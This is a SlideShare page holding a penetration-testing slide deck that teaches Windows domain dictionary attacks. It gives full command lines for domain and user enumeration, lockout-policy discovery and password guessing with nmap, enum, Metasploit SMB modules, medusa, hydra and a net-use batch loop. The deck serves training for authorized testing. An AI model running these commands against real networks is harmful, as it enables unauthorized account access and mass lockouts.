SlideShare a Scribd company logo
3
Most read
5
Most read
7
Most read
Introduction to Windows Dictionary Attacks
Author: Scott Sutherland
Who am I?

Scott Sutherland
• Principal Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: Blogs, white papers,
  tools etc
Presentation Goals

• Identify the value of dictionary attacks
• Provide new penetration testers with a safe
  approach to Windows dictionary attacks
• Provide security professionals with questions
  they should be asking their contractors
Before we begin…

     Dictionary Attack




    Brute Force Attack
Why dictionary attacks?

What are the goals?
• Identify accounts configured with weak or
  default passwords – “It’s human nature”
• Use accounts as entry points during penetration
  tests

What’s the impact?
• Unauthorized access to critical:
  ‒ Systems
  ‒ Applications
  ‒ data
• User impersonation
Are There Alternatives?

Yes.

Approaches typically includes:
• Cracking pw hashes offline with:
  ‒ Pre-computed hash libraries like Rainbow
    Tables
  ‒ Brute force and dictionary techniques using
    tools like Hashcat and John the Ripper
• Dumping clear text passwords for interactive
  sessions with Mimikatz
Dictionary Attacks: Process Overview

Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
Identify Domains: Methods

Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for
  “USERDNSDOMAIN”
• Review the registry for the default domain
Identify Domains: Tools

    Method                          Tools                         Auth
                  IPCONFIG
DHCP Info                                                        No
NetBIOS Queries   NETSTAT –A <IP>                                No
                  nmap -sL <IP Range> -oA output_rnds
DNS Queries                                                      No
                  ./reverseraider -r <IP Range>

                  ./dnswalk victem.com

                  perl fierce.pl -dns <domainname> -threads
                  5 -file <domainame>-dns.output
                  Wireshark (GUI) + Filter for browser traffic
Sniffing                                                         No
                  Network Monitor (GUI)

                  Etherape (GUI)
                  nmap –sS –PN –p3389 <IP Range>
RDP Drop Down     Then visit with RDP client
                                                                 No
Enumerate DCs: Methods

Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning

Authenticated Methods
• NET GROUP commands
• LDAP Queries
Enumerate DCs: Tools

  Methods                            Tools                            Auth
                NSLOOKUP –type=SRV _ldap._tcp.<domain>
DNS Queries                                                           No
                NLTEST /DCLIST <domain>
RPC Queries     FindPDC <domain> <request count>
                                                                      No
                NMAP –sS –p389,636 –PN <IP Range>
Port Scanning                                                         No
                FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT
NetBIOS         –A %i
                                                                      No
Scanning
                Net group “Domain Controllers” /domain
NET GROUP                                                             Yes
Command
                LDAP Administrator (GUI Tool)
LDAP Queries                                                          Yes
                Hyena (GUI Tool)                                      &
                adfind -b -sc dcdmp <domain> -gc | grep -i “>name:”   No
                | gawk -F ” ” “{print $2}” | sort | uniq
Enumerate Domain Users: Methods

Unauthenticated Methods
• RPC Queries
• SID Brute Forcing
• SNMP Queries
• LDAP Queries
• Sharepoint Fuzzing
Authenticated Methods
• NET USER command
• WMI commands
Enumerate Domain Users: Tools 1

  Methods                       Tools                     Auth
            dumpsec.exe /computer=<IP> /rpt=usersonly
RPC         /saveas=csv /outfile=domain_users.txt
                                                          Yes
Endpoints                                                 &
            enum –N <ip>
                                                          no
            enum –U <ip>
            ruby c:metasploitmsf3msfcli
SID Brute   auxiliary/scanner/smb/smb_lookupsid
                                                          Yes
Forcing     SMBDomain=. MaxRID=10000 RHOSTS=<IP           &
            Address> E > domain_users.txt
                                                          no
            Getacct (GUI)
            ruby c:metasploitmsf3msfcli
SNMP        auxiliary/scanner/snmp/snmp_enumusers
                                                          Yes
Queries     SMBDomain=. RHOSTS=<IP Address> E             &
            Mibbrowser (GUI)                              no
            SNMP Walk
Enumerate Domain Users: Tools 2

  Methods                            Tools                            Auth
               adfind -b DC=<victim>,DC=<com> -f
LDAP Queries   “objectcategory=user” -gc | grep -i
                                                                      Yes
               “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk    &
               -F ” ” “{print $1}”| sort > domain_users.txt
                                                                      no
               Fuzz parameters with BURP to enumerate domain
Sharepoint     users. Example URL below:
                                                                      Yes
Fuzzing                                                               &
               https://www.[website].com/sites/[sitename]/_layouts/
               userdisp.aspx?Force=True&ID=[2 ]                       no
               Net users /domain > domain_users.txt
NET USERS                                                             Yes
Command
               wmic /user:<user> /password:<password> /node:<IP
WMI            address> domain_users.txt
                                                                      Yes
Commands
Get Domain Lockout Policy: Methods

Unauthenticated Methods
• RPC Endpoints
                          Lockout
Authenticated Methods     threshold: 5
• NET ACCOUNTS            Lockout
                          duration: 15
  Command
                          Lockout
                          observation
What does it all mean?    window : 15
• Threshold, duration,
  and window
Get Domain Lockout Policy: Tools

  Methods                         Tools                  Auth
RPC Queries   Enum –P <IP Address>
                                                         Yes
                                                         &
              dumpsec.exe /computer=<IP> /rpt=policy
              /saveas=csv /outfile=domain_policy.txt     No
              NET ACCOUNTS
NET                                                      YEs
ACCOUNTS
COMMAND
Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password

Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team>Number>

Popular Dictionaries
• Metasploit dictionaries
• Rock you
• FuzzDB
• John the ripper
Create a Dictionary: Tools

      Dictionary                    URLs / Lists
                   Blank password
Classics           Username as password
                   password as password
                   <Password><Number>
                   <Companyname><Number>
Formulas           <Season><Year>
                   <Sports team>Number>

                   Your Brain! Think of keywords relative to the target
                   company /geographic location and you’ll get more out
                   of your dictionary attacks!
                   http://www.skullsecurity.org/wiki/index.php/Passwords
Rockyou
                   http://code.google.com/p/fuzzdb/
FuzzDB             https://github.com/rustyrobot/fuzzdb
                   http://www.openwall.com/wordlists/
John the Ripper
Perform Dictionary Attack: Rules

             The Rule to Live By:
           Respect the lockout policy

• General idea = Attempt a few passwords for all
  of the domain users each round, not a 1000
  passwords against one user

• Subtract 2 attempts from the lockout policy
       Example: Lockout=5, Attempts=3

• Wait 5 to 10 minutes beyond the observation
  window
Perform Dictionary Attack: Tools

   Tools                        Commands                                OS
               medusa -H hosts.txt -U users.txt -P passwords.txt -
Medusa         T 20 -t 10 -L -F -M smbnt
                                                                     Linux
               Easy to use GUI and not CLI that I know of.
Bruter                                                               Windows
               ruby c:metasploitmsf3msfcli
Metasploit     auxiliary/scanner/smb/smb_login THREADS=5
                                                                     Windows
smb_login      BLANK_PASSWORDS=true USER_AS_PASS=true                and Linux
               PASS_FILE=c:passwords.txt
               USER_FILE=c:allusers.txt SMBDomain=.
               RHOSTS=192.168.1.1 E
               hydra.exe -L users.txt -P passwords.txt -o
Hydra          credentials.txt <ip> smb
                                                                     Windows
                                                                     and Linux
               FOR /F “tokens=*” %a in (‘type passwords.txt’) do
Batch Script   net user <ip>IPC$ /user:<user> %a
                                                                     Windows
Conclusions

• There is more than one way to do
  everything!
• Enumerate all available options
• It’s easy to lockout accounts – respect the
  password policy 
• Always ask contractors what their approach
  is to reduce the chance of account lockouts
  during penetration tests

More Related Content

PPTX
Encryption
PPTX
Password Attack
PPT
6. cryptography
PPTX
Brute force-attack presentation
PDF
Introduction to Cryptography
PPTX
Encryption
PPTX
Cryptography.ppt
PPT
Digital signature
Encryption
Password Attack
6. cryptography
Brute force-attack presentation
Introduction to Cryptography
Encryption
Cryptography.ppt
Digital signature

What's hot (20)

PPTX
Ssl and tls
PDF
CRYPTOGRAPHY AND NETWORK SECURITY
PPTX
Password Cracking
PPTX
cryptography
PDF
2. Stream Ciphers
PPTX
Cryptography
PPTX
Ethical hacking : Its methodologies and tools
PPTX
Cryptography.ppt
PPTX
Data encryption
PDF
Web Application Security 101
ODP
Email security
PPTX
Introduction to Cryptography
PPTX
Diffie Hellman Key Exchange
PPT
13 asymmetric key cryptography
PPTX
Cryptography
PPTX
Different types of attacks in internet
PPTX
Malware Classification and Analysis
PPTX
Transposition Cipher
PPTX
Intrusion detection and prevention system
Ssl and tls
CRYPTOGRAPHY AND NETWORK SECURITY
Password Cracking
cryptography
2. Stream Ciphers
Cryptography
Ethical hacking : Its methodologies and tools
Cryptography.ppt
Data encryption
Web Application Security 101
Email security
Introduction to Cryptography
Diffie Hellman Key Exchange
13 asymmetric key cryptography
Cryptography
Different types of attacks in internet
Malware Classification and Analysis
Transposition Cipher
Intrusion detection and prevention system
Ad

Viewers also liked (17)

PPT
Machine language
PPTX
Timing Attacks and Ruby on Rails
PPTX
Cryptanalytic timing attacks 1
PDF
Introduction to Windows Dictionary Attacks
PPTX
Perkenalan Keamanan Siber Offensive Security of SMAN 1 Karawang /w Aurumradia...
PPTX
Kali Linux Installation - VMware
PPTX
Brute force attack
PDF
Computer Security
PPTX
Cybersecurity 1. intro to cybersecurity
PPT
Introduction to Cyber Security
PPTX
Computer security threats & prevention
PDF
Top Cyber Security Trends for 2016
PDF
Secure Coding and Threat Modeling
PPTX
Kali Linux - Falconer
PPTX
Cyber security presentation
PPTX
Cyber security
Machine language
Timing Attacks and Ruby on Rails
Cryptanalytic timing attacks 1
Introduction to Windows Dictionary Attacks
Perkenalan Keamanan Siber Offensive Security of SMAN 1 Karawang /w Aurumradia...
Kali Linux Installation - VMware
Brute force attack
Computer Security
Cybersecurity 1. intro to cybersecurity
Introduction to Cyber Security
Computer security threats & prevention
Top Cyber Security Trends for 2016
Secure Coding and Threat Modeling
Kali Linux - Falconer
Cyber security presentation
Cyber security
Ad

Similar to Introduction to Windows Dictionary Attacks (20)

PPTX
Hunting for APT in network logs workshop presentation
PPT
Intro To Hacking
PDF
A22 Introduction to DTrace by Kyle Hailey
PDF
Solaris DTrace, An Introduction
PPTX
DC612 Day - Hands on Penetration Testing 101
PPTX
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
PPTX
Recon with Nmap
PPTX
Null Delhi chapter - Feb 2019
PDF
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
PDF
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
PDF
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
PDF
Debugging Network Issues
PPT
hacking and crecjing
PDF
Footprinting tools for security auditors
PDF
OSMC 2009 | net-snmp: The forgotten classic by Dr. Michael Schwartzkopff
PDF
Tools kali
PPT
01204427-scanner.ppt
PDF
Nmap scripting engine
Hunting for APT in network logs workshop presentation
Intro To Hacking
A22 Introduction to DTrace by Kyle Hailey
Solaris DTrace, An Introduction
DC612 Day - Hands on Penetration Testing 101
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
Recon with Nmap
Null Delhi chapter - Feb 2019
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Debugging Network Issues
hacking and crecjing
Footprinting tools for security auditors
OSMC 2009 | net-snmp: The forgotten classic by Dr. Michael Schwartzkopff
Tools kali
01204427-scanner.ppt
Nmap scripting engine

More from Scott Sutherland (20)

PPTX
Hunting SMB Shares with Data, Graphs, Charts, and LLMs (SO-CON 2025)
PPTX
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
PPTX
How to Build and Validate Ransomware Attack Detections (Secure360)
PDF
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
PPTX
2019 Blackhat Booth Presentation - PowerUpSQL
PDF
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PPTX
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
PPTX
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
PPTX
Beyond xp_cmdshell: Owning the Empire through SQL Server
PPTX
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
PPTX
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
PPTX
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
PPTX
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
PPTX
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
PPTX
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
PDF
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
PDF
Attack All the Layers: What's Working during Pentests (OWASP NYC)
PPTX
Secure360 - Attack All the Layers! Again!
PPTX
Secure360 - Extracting Password from Windows
PPTX
WTF is Penetration Testing v.2
Hunting SMB Shares with Data, Graphs, Charts, and LLMs (SO-CON 2025)
Into the Abyss: Evaluating Active Directory SMB Shares on Scale (Secure360)
How to Build and Validate Ransomware Attack Detections (Secure360)
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
2019 Blackhat Booth Presentation - PowerUpSQL
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Thotcon - Hacking SQL Servers on Scale with PowerShell
2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Secure360 - Attack All the Layers! Again!
Secure360 - Extracting Password from Windows
WTF is Penetration Testing v.2

Recently uploaded (20)

PDF
Spectral efficient network and resource selection model in 5G networks
PDF
Network Security Unit 5.pdf for BCA BBA.
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
Approach and Philosophy of On baking technology
DOCX
The AUB Centre for AI in Media Proposal.docx
PDF
Modernizing your data center with Dell and AMD
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Spectral efficient network and resource selection model in 5G networks
Network Security Unit 5.pdf for BCA BBA.
Per capita expenditure prediction using model stacking based on satellite ima...
Understanding_Digital_Forensics_Presentation.pptx
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
“AI and Expert System Decision Support & Business Intelligence Systems”
Mobile App Security Testing_ A Comprehensive Guide.pdf
20250228 LYD VKU AI Blended-Learning.pptx
Approach and Philosophy of On baking technology
The AUB Centre for AI in Media Proposal.docx
Modernizing your data center with Dell and AMD
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Digital-Transformation-Roadmap-for-Companies.pptx
Diabetes mellitus diagnosis method based random forest with bat algorithm
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Advanced methodologies resolving dimensionality complications for autism neur...
Chapter 3 Spatial Domain Image Processing.pdf

Introduction to Windows Dictionary Attacks

  • 1. Introduction to Windows Dictionary Attacks Author: Scott Sutherland
  • 2. Who am I? Scott Sutherland • Principal Security Consultant @ NetSPI • Over 10 years of consulting experience • Security researcher: Blogs, white papers, tools etc
  • 3. Presentation Goals • Identify the value of dictionary attacks • Provide new penetration testers with a safe approach to Windows dictionary attacks • Provide security professionals with questions they should be asking their contractors
  • 4. Before we begin… Dictionary Attack Brute Force Attack
  • 5. Why dictionary attacks? What are the goals? • Identify accounts configured with weak or default passwords – “It’s human nature” • Use accounts as entry points during penetration tests What’s the impact? • Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data • User impersonation
  • 6. Are There Alternatives? Yes. Approaches typically includes: • Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper • Dumping clear text passwords for interactive sessions with Mimikatz
  • 7. Dictionary Attacks: Process Overview Windows Dictionary Attack Process 1. Identify domains 2. Enumerate domain controllers 3. Enumerate domain users 4. Enumerate domain lockout policy 5. Create a dictionary 6. Perform Attack
  • 8. Identify Domains: Methods Unauthenticated Methods • DHCP Information • NetBIOS Queries • DNS Queries • Sniffing Network Traffic • Review RDP drop down lists Authenticated Methods • Review the output of the SET command for “USERDNSDOMAIN” • Review the registry for the default domain
  • 9. Identify Domains: Tools Method Tools Auth IPCONFIG DHCP Info No NetBIOS Queries NETSTAT –A <IP> No nmap -sL <IP Range> -oA output_rnds DNS Queries No ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output Wireshark (GUI) + Filter for browser traffic Sniffing No Network Monitor (GUI) Etherape (GUI) nmap –sS –PN –p3389 <IP Range> RDP Drop Down Then visit with RDP client No
  • 10. Enumerate DCs: Methods Unauthenticated Methods • DNS Queries • RPC Queries • Port Scanning • NetBIOS Scanning Authenticated Methods • NET GROUP commands • LDAP Queries
  • 11. Enumerate DCs: Tools Methods Tools Auth NSLOOKUP –type=SRV _ldap._tcp.<domain> DNS Queries No NLTEST /DCLIST <domain> RPC Queries FindPDC <domain> <request count> No NMAP –sS –p389,636 –PN <IP Range> Port Scanning No FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT NetBIOS –A %i No Scanning Net group “Domain Controllers” /domain NET GROUP Yes Command LDAP Administrator (GUI Tool) LDAP Queries Yes Hyena (GUI Tool) & adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” No | gawk -F ” ” “{print $2}” | sort | uniq
  • 12. Enumerate Domain Users: Methods Unauthenticated Methods • RPC Queries • SID Brute Forcing • SNMP Queries • LDAP Queries • Sharepoint Fuzzing Authenticated Methods • NET USER command • WMI commands
  • 13. Enumerate Domain Users: Tools 1 Methods Tools Auth dumpsec.exe /computer=<IP> /rpt=usersonly RPC /saveas=csv /outfile=domain_users.txt Yes Endpoints & enum –N <ip> no enum –U <ip> ruby c:metasploitmsf3msfcli SID Brute auxiliary/scanner/smb/smb_lookupsid Yes Forcing SMBDomain=. MaxRID=10000 RHOSTS=<IP & Address> E > domain_users.txt no Getacct (GUI) ruby c:metasploitmsf3msfcli SNMP auxiliary/scanner/snmp/snmp_enumusers Yes Queries SMBDomain=. RHOSTS=<IP Address> E & Mibbrowser (GUI) no SNMP Walk
  • 14. Enumerate Domain Users: Tools 2 Methods Tools Auth adfind -b DC=<victim>,DC=<com> -f LDAP Queries “objectcategory=user” -gc | grep -i Yes “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk & -F ” ” “{print $1}”| sort > domain_users.txt no Fuzz parameters with BURP to enumerate domain Sharepoint users. Example URL below: Yes Fuzzing & https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] no Net users /domain > domain_users.txt NET USERS Yes Command wmic /user:<user> /password:<password> /node:<IP WMI address> domain_users.txt Yes Commands
  • 15. Get Domain Lockout Policy: Methods Unauthenticated Methods • RPC Endpoints Lockout Authenticated Methods threshold: 5 • NET ACCOUNTS Lockout duration: 15 Command Lockout observation What does it all mean? window : 15 • Threshold, duration, and window
  • 16. Get Domain Lockout Policy: Tools Methods Tools Auth RPC Queries Enum –P <IP Address> Yes & dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt No NET ACCOUNTS NET YEs ACCOUNTS COMMAND
  • 17. Create a Dictionary: Methods Classics Still Work • Blank • Username as password • password Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number> Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
  • 18. Create a Dictionary: Tools Dictionary URLs / Lists Blank password Classics Username as password password as password <Password><Number> <Companyname><Number> Formulas <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! http://www.skullsecurity.org/wiki/index.php/Passwords Rockyou http://code.google.com/p/fuzzdb/ FuzzDB https://github.com/rustyrobot/fuzzdb http://www.openwall.com/wordlists/ John the Ripper
  • 19. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy • General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user • Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3 • Wait 5 to 10 minutes beyond the observation window
  • 20. Perform Dictionary Attack: Tools Tools Commands OS medusa -H hosts.txt -U users.txt -P passwords.txt - Medusa T 20 -t 10 -L -F -M smbnt Linux Easy to use GUI and not CLI that I know of. Bruter Windows ruby c:metasploitmsf3msfcli Metasploit auxiliary/scanner/smb/smb_login THREADS=5 Windows smb_login BLANK_PASSWORDS=true USER_AS_PASS=true and Linux PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E hydra.exe -L users.txt -P passwords.txt -o Hydra credentials.txt <ip> smb Windows and Linux FOR /F “tokens=*” %a in (‘type passwords.txt’) do Batch Script net user <ip>IPC$ /user:<user> %a Windows
  • 21. Conclusions • There is more than one way to do everything! • Enumerate all available options • It’s easy to lockout accounts – respect the password policy  • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests